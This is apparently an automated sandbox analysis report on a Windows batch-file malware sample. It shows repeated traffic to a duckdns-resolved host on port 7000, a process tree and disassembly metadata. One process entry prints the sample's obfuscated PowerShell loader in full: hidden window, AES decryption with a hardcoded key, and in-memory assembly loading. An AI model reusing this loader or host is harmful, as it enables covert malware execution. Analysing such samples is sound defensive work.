                  Oct 26, 2024 08:54:08.625811100 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:08.631154060 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:08.753562927 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:08.754877090 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:08.760255098 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:11.912868977 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:12.070501089 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:23.092231035 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:23.097599983 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:23.336560011 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:23.344228983 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:23.350161076 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:23.966766119 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:23.972095966 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:24.211210966 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:24.215004921 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:24.220797062 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:34.218612909 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:34.224005938 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:34.247741938 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:34.253061056 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:34.462620974 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:34.465447903 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:34.470735073 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:34.580318928 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:34.583185911 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:34.588521957 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:35.013351917 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:35.018740892 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:35.258186102 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:35.261598110 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:35.266958952 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:35.703068018 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:35.708667994 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:35.956947088 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:35.959914923 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:35.965531111 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:38.747857094 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:38.753483057 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:38.992547035 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:39.000264883 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:39.006123066 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:41.908904076 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:41.919712067 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:41.925263882 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:42.164751053 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:42.166456938 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:42.172024012 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:44.419707060 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:44.425268888 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:44.450861931 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:44.456346989 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:44.724772930 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:44.726260900 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:44.731694937 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:44.843353987 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:44.844727039 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:44.850301027 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:48.622828007 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:48.633758068 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:49.040667057 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:49.049263000 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:49.054816008 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:54.638417959 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:54.644002914 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:54.685209990 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:54.690691948 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:54.882755995 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:54.885848999 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:54.891207933 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:54.999825001 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:54:55.004059076 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:54:55.009443045 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:01.732291937 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:55:01.737839937 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:01.977421999 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:01.979041100 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:55:01.984502077 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:04.060333014 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:55:04.065819979 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:04.382703066 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:04.384219885 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:55:04.389631033 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:04.747836113 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:55:04.753365040 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:04.810327053 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:55:04.815933943 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:04.841557980 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:55:04.847023010 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:04.888887882 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:55:04.894476891 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:04.992424011 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:04.995620012 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:55:05.001777887 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:05.093553066 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:05.099329948 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:55:05.104799986 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:05.109200001 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:05.111332893 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:55:05.157582045 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:05.226403952 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:05.228286028 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:55:05.233865023 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:09.796305895 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:55:09.801645041 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:10.062537909 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:10.063220978 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:55:10.068710089 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:12.211600065 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:12.211666107 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:12.212346077 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:55:24.483130932 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:55:24.489433050 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:24.727210045 CEST700049732101.99.92.203192.168.2.4
                  Oct 26, 2024 08:55:24.728281021 CEST497327000192.168.2.4101.99.92.203
                  Oct 26, 2024 08:55:24.733690023 CEST700049732101.99.92.203192.168.2.4
                  TimestampSource PortDest PortSource IPDest IP
                  Oct 26, 2024 08:51:13.811105967 CEST5329753192.168.2.41.1.1.1
                  Oct 26, 2024 08:51:14.825752974 CEST5329753192.168.2.41.1.1.1
                  Oct 26, 2024 08:51:15.825669050 CEST5329753192.168.2.41.1.1.1
                  Oct 26, 2024 08:51:16.321717024 CEST53532971.1.1.1192.168.2.4
                  Oct 26, 2024 08:51:16.321732044 CEST53532971.1.1.1192.168.2.4
                  Oct 26, 2024 08:51:16.321743011 CEST53532971.1.1.1192.168.2.4
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Oct 26, 2024 08:51:13.811105967 CEST192.168.2.41.1.1.10xbed6Standard query (0)dcxwq1.duckdns.orgA (IP address)IN (0x0001)false
                  Oct 26, 2024 08:51:14.825752974 CEST192.168.2.41.1.1.10xbed6Standard query (0)dcxwq1.duckdns.orgA (IP address)IN (0x0001)false
                  Oct 26, 2024 08:51:15.825669050 CEST192.168.2.41.1.1.10xbed6Standard query (0)dcxwq1.duckdns.orgA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Oct 26, 2024 08:51:16.321717024 CEST1.1.1.1192.168.2.40xbed6No error (0)dcxwq1.duckdns.org101.99.92.203A (IP address)IN (0x0001)false
                  Oct 26, 2024 08:51:16.321732044 CEST1.1.1.1192.168.2.40xbed6No error (0)dcxwq1.duckdns.org101.99.92.203A (IP address)IN (0x0001)false
                  Oct 26, 2024 08:51:16.321743011 CEST1.1.1.1192.168.2.40xbed6No error (0)dcxwq1.duckdns.org101.99.92.203A (IP address)IN (0x0001)false

                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:02:51:02
                  Start date:26/10/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\b.cmd" "
                  Imagebase:0x7ff6ca130000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:1
                  Start time:02:51:02
                  Start date:26/10/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7699e0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:2
                  Start time:02:51:02
                  Start date:26/10/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:cmd /c \"set __=^&rem\
                  Imagebase:0x7ff6ca130000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:3
                  Start time:02:51:02
                  Start date:26/10/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\b.cmd"
                  Imagebase:0x7ff6ca130000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:4
                  Start time:02:51:02
                  Start date:26/10/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7699e0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:5
                  Start time:02:51:02
                  Start date:26/10/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:cmd /c \"set __=^&rem\
                  Imagebase:0x7ff6ca130000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:6
                  Start time:02:51:02
                  Start date:26/10/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\b.cmd';$rWNT='DecpxHCopxHCmppxHCrespxHCspxHC'.Replace('pxHC', ''),'MaTGyrinTGyrMTGyroTGyrdTGyrulTGyreTGyr'.Replace('TGyr', ''),'CrYsKteYsKtateYsKtDYsKteYsKtcrYsKtypYsKttoYsKtrYsKt'.Replace('YsKt', ''),'Idnlzndnlzvdnlzokdnlzednlz'.Replace('dnlz', ''),'TraGoiknsfGoikoGoikrmFGoikinaGoiklBlGoikockGoik'.Replace('Goik', ''),'LoStkNadStkN'.Replace('StkN', ''),'FroMxWcmBaMxWcse6MxWc4StMxWcriMxWcngMxWc'.Replace('MxWc', ''),'EnrgYjtrrgYjyrgYjPorgYjinrgYjtrgYj'.Replace('rgYj', ''),'CqJGUopqJGUyqJGUTqJGUoqJGU'.Replace('qJGU', ''),'ElywTEeywTEmenywTEtAywTEtywTE'.Replace('ywTE', ''),'ReaMpXgdLMpXgineMpXgsMpXg'.Replace('MpXg', ''),'CeuHLheuHLangeuHLeExeuHLteeuHLnseuHLioneuHL'.Replace('euHL', ''),'SKlTEpliKlTEtKlTE'.Replace('KlTE', ''),'GzasmetzasmCuzasmrrzasmentzasmPrzasmocezasmszasmszasm'.Replace('zasm', '');powershell -w hidden;function OgEIm($Xyfkn){$KStrb=[System.Security.Cryptography.Aes]::Create();$KStrb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KStrb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KStrb.Key=[System.Convert]::($rWNT[6])('xA1+WTJaPCUsOeL/aM8gYjpdFXCHAzsSe7O9jqgG6tE=');$KStrb.IV=[System.Convert]::($rWNT[6])('o+k4tdVDsXdevRbseXqo5Q==');$OoABI=$KStrb.($rWNT[2])();$gCRFY=$OoABI.($rWNT[4])($Xyfkn,0,$Xyfkn.Length);$OoABI.Dispose();$KStrb.Dispose();$gCRFY;}function bkQvC($Xyfkn){$pXxPg=New-Object System.IO.MemoryStream(,$Xyfkn);$ztkwM=New-Object System.IO.MemoryStream;$RxDER=New-Object System.IO.Compression.GZipStream($pXxPg,[IO.Compression.CompressionMode]::($rWNT[0]));$RxDER.($rWNT[8])($ztkwM);$RxDER.Dispose();$pXxPg.Dispose();$ztkwM.Dispose();$ztkwM.ToArray();}$QaWhK=[System.IO.File]::($rWNT[10])([Console]::Title);$TOEth=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 5).Substring(2))));$kobGz=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 6).Substring(2))));[System.Reflection.Assembly]::($rWNT[5])([byte[]]$kobGz).($rWNT[7]).($rWNT[3])($null,$null);[System.Reflection.Assembly]::($rWNT[5])([byte[]]$TOEth).($rWNT[7]).($rWNT[3])($null,$null); "
                  Imagebase:0x7ff6ca130000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:7
                  Start time:02:51:02
                  Start date:26/10/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Imagebase:0x7ff788560000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:8
                  Start time:02:51:05
                  Start date:26/10/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                  Imagebase:0x7ff788560000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Reset < >

                    Execution Graph

                    Execution Coverage:1.1%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:8
                    Total number of Limit Nodes:1
                    execution_graph 11949 7ffd9b79d4f9 11951 7ffd9b79d50f 11949->11951 11950 7ffd9b79d552 11951->11950 11952 7ffd9b79d67d CreateFileW 11951->11952 11953 7ffd9b79d6de 11952->11953 11954 7ffd9b7945e4 11955 7ffd9b7945eb GetFileType 11954->11955 11957 7ffd9b7dfcc4 11955->11957

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 47 7ffd9b796e20-7ffd9b79c73a 51 7ffd9b79c73c-7ffd9b79c74c 47->51 52 7ffd9b79c74e-7ffd9b79c75f 47->52 51->51 51->52 53 7ffd9b79c770-7ffd9b79c7a1 52->53 54 7ffd9b79c761-7ffd9b79c76f 52->54 58 7ffd9b79c7f7-7ffd9b79c7fe 53->58 59 7ffd9b79c7a3-7ffd9b79c7a9 53->59 54->53 60 7ffd9b79c800-7ffd9b79c801 58->60 61 7ffd9b79c83f-7ffd9b79c868 58->61 59->58 62 7ffd9b79c7ab-7ffd9b79c7ac 59->62 63 7ffd9b79c804-7ffd9b79c807 60->63 64 7ffd9b79c7af-7ffd9b79c7b2 62->64 66 7ffd9b79c869-7ffd9b79cb61 call 7ffd9b794620 63->66 67 7ffd9b79c809-7ffd9b79c81a 63->67 65 7ffd9b79c7b8-7ffd9b79c7c8 64->65 64->66 69 7ffd9b79c7ca-7ffd9b79c7ec 65->69 70 7ffd9b79c7f0-7ffd9b79c7f5 65->70 110 7ffd9b79cb65-7ffd9b79cb93 66->110 71 7ffd9b79c836-7ffd9b79c83d 67->71 72 7ffd9b79c81c-7ffd9b79c822 67->72 69->70 70->58 70->64 71->61 71->63 72->66 74 7ffd9b79c824-7ffd9b79c832 72->74 74->71 111 7ffd9b79cb9a-7ffd9b79cbb6 110->111 113 7ffd9b79cbb8-7ffd9b79cbba 111->113 114 7ffd9b79cbbc-7ffd9b79cbd5 111->114 115 7ffd9b79cbd7-7ffd9b79cbe5 113->115 114->115 117 7ffd9b79cbeb-7ffd9b79cc71 call 7ffd9b797c08 115->117 118 7ffd9b79cc72-7ffd9b79cc9e 115->118 117->118 121 7ffd9b79cd58-7ffd9b79cd98 118->121 122 7ffd9b79cca4-7ffd9b79cd57 call 7ffd9b797bb8 118->122 131 7ffd9b79ce89-7ffd9b79ce97 call 7ffd9b79cf2e 121->131 132 7ffd9b79cd9e-7ffd9b79cdac 121->132 122->121 146 7ffd9b79ceaa-7ffd9b79ceb5 131->146 147 7ffd9b79ce99-7ffd9b79cea9 131->147 135 7ffd9b79cdb2-7ffd9b79cdbd 132->135 136 7ffd9b79ce41-7ffd9b79ce6f 132->136 148 7ffd9b79ce82-7ffd9b79ce86 136->148 149 7ffd9b79ce71-7ffd9b79ce81 136->149 156 7ffd9b79ceb7-7ffd9b79cefb call 7ffd9b792ed8 146->156 157 7ffd9b79cf0d-7ffd9b79cf2d 146->157 147->146 148->131 149->148 156->157
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: ZK_H
                    • API String ID: 0-3156204226
                    • Opcode ID: 152f2ac28e81faa26f9d82a78a08ae31670464e2989bdcfbb4aa14a64e818906
                    • Instruction ID: aabf2f201eeb478571b0076e226651f3b55582c5984f46159e20c57d4c98e2fd
                    • Opcode Fuzzy Hash: 152f2ac28e81faa26f9d82a78a08ae31670464e2989bdcfbb4aa14a64e818906
                    • Instruction Fuzzy Hash: A2427971B1EB8E4FEB58DB7884666B977D1FF55310B0543BED04AC72B6DE28A8028740

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: ZK_H
                    • API String ID: 0-3156204226
                    • Opcode ID: 92928f7aec1312a36e64fc84a6b982a7fb247a9f8967566b1d7a7d52d66546e4
                    • Instruction ID: 146539b5962b758727eca21795f7611cc340825aa4aed986ff72b3aaeb00aa36
                    • Opcode Fuzzy Hash: 92928f7aec1312a36e64fc84a6b982a7fb247a9f8967566b1d7a7d52d66546e4
                    • Instruction Fuzzy Hash: 30E11771B1EB8A4FEB99DB7C84266A977D1EF95310B0582FED04AC72F6DD285C028740

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: ZK_H
                    • API String ID: 0-3156204226
                    • Opcode ID: 1b4eba233832ce54de0719c0b3c59b1275cd1ee042add5a8b69f0d14e4aaa8ce
                    • Instruction ID: 404dcad692a76b878d7a4c1f48cfb1529d40cc95c7cb53caa75f64f9f629b5c6
                    • Opcode Fuzzy Hash: 1b4eba233832ce54de0719c0b3c59b1275cd1ee042add5a8b69f0d14e4aaa8ce
                    • Instruction Fuzzy Hash: D9B12771B1EB8A4FEB599B7C84366A977D1EF95310B0542FED04ACB2F6DD285C028740

                    Control-flow Graph

                    Memory Dump Source
                    • Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18286a65e56f52f30e6a765b8524ed02b4a5b2cb920f339943ba8099f20a724
                    • Instruction ID: 7b5c1fda22c09a15aa9212a874bc69e156a5993e84aeb1537ce511a287958698
                    • Opcode Fuzzy Hash: b18286a65e56f52f30e6a765b8524ed02b4a5b2cb920f339943ba8099f20a724
                    • Instruction Fuzzy Hash: 95A13771B0EB8A4FEB599B7C84366A977D1EF95310B0542FED04ACB2F6DD285C428740

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 9fad25dc1c95d52ba46f5e38d314b465be23e077513438fab2fd0ff48225e32b
                    • Instruction ID: e26f90bdf47334ae997cb7f95826f03482c02b5b03854591b057258a46142e95
                    • Opcode Fuzzy Hash: 9fad25dc1c95d52ba46f5e38d314b465be23e077513438fab2fd0ff48225e32b
                    • Instruction Fuzzy Hash: 3D71E471A0DB484FD758DF6CD859AA97BE0FF59314F0542BEE04DD32A2DB24A8028781

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 271 7ffd9b7945d4-7ffd9b79d673 276 7ffd9b79d675-7ffd9b79d67a 271->276 277 7ffd9b79d67d-7ffd9b79d6dc CreateFileW 271->277 276->277 278 7ffd9b79d6de 277->278 279 7ffd9b79d6e4-7ffd9b79d70c 277->279 278->279
                    APIs
                    Memory Dump Source
                    • Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: d2e7862fae98592da46975e60accf117f762eb7132bb1f939de436e8dcd4c2b6
                    • Instruction ID: 4b4b49d9054ff2726594c2a551378deaaa35054d73bc7e19028d1a6a7d20d3dc
                    • Opcode Fuzzy Hash: d2e7862fae98592da46975e60accf117f762eb7132bb1f939de436e8dcd4c2b6
                    • Instruction Fuzzy Hash: 9D319331A1CA1C8FDB58EF58D849AF977E0FB69311F04422EE04EE3251DB71A9018BC1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 349 7ffd9b7945e4-7ffd9b7dfcc2 GetFileType 354 7ffd9b7dfcca-7ffd9b7dfcef 349->354 355 7ffd9b7dfcc4 349->355 355->354
                    APIs
                    Memory Dump Source
                    • Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd
                    Similarity
                    • API ID: FileType
                    • String ID:
                    • API String ID: 3081899298-0
                    • Opcode ID: bdf655953c54c964378b5d81d537fa0035041b3df63f456ed32b6e66c6593d6f
                    • Instruction ID: f9ee384bbec338ea960905eafed599cdab082c131adc58e6b983626fc4346bd0
                    • Opcode Fuzzy Hash: bdf655953c54c964378b5d81d537fa0035041b3df63f456ed32b6e66c6593d6f
                    • Instruction Fuzzy Hash: 7C21A330A08A0C9FDB58EB98D849BFDB7E0FB95321F10422ED04ED3691DB71A815CB91

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 357 7ffd9b8615dd-7ffd9b8615e7 358 7ffd9b8615ee-7ffd9b8615ff 357->358 359 7ffd9b8615e9 357->359 361 7ffd9b861601 358->361 362 7ffd9b861606-7ffd9b861617 358->362 359->358 360 7ffd9b8615eb 359->360 360->358 361->362 363 7ffd9b861603 361->363 364 7ffd9b86161e-7ffd9b86162f 362->364 365 7ffd9b861619 362->365 363->362 367 7ffd9b861631 364->367 368 7ffd9b861636-7ffd9b861647 364->368 365->364 366 7ffd9b86161b 365->366 366->364 367->368 369 7ffd9b861633 367->369 370 7ffd9b86164e-7ffd9b86170f 368->370 371 7ffd9b861649 368->371 369->368 375 7ffd9b861926-7ffd9b861984 370->375 376 7ffd9b861715-7ffd9b86171f 370->376 371->370 372 7ffd9b86164b 371->372 372->370 394 7ffd9b8619af-7ffd9b8619bb 375->394 395 7ffd9b861986-7ffd9b8619ad 375->395 377 7ffd9b861721-7ffd9b861739 376->377 378 7ffd9b86173b-7ffd9b861748 376->378 377->378 385 7ffd9b86174e-7ffd9b861751 378->385 386 7ffd9b8618bb-7ffd9b8618c5 378->386 385->386 388 7ffd9b861757-7ffd9b86175f 385->388 389 7ffd9b8618d8-7ffd9b861923 386->389 390 7ffd9b8618c7-7ffd9b8618d7 386->390 388->375 392 7ffd9b861765-7ffd9b86176f 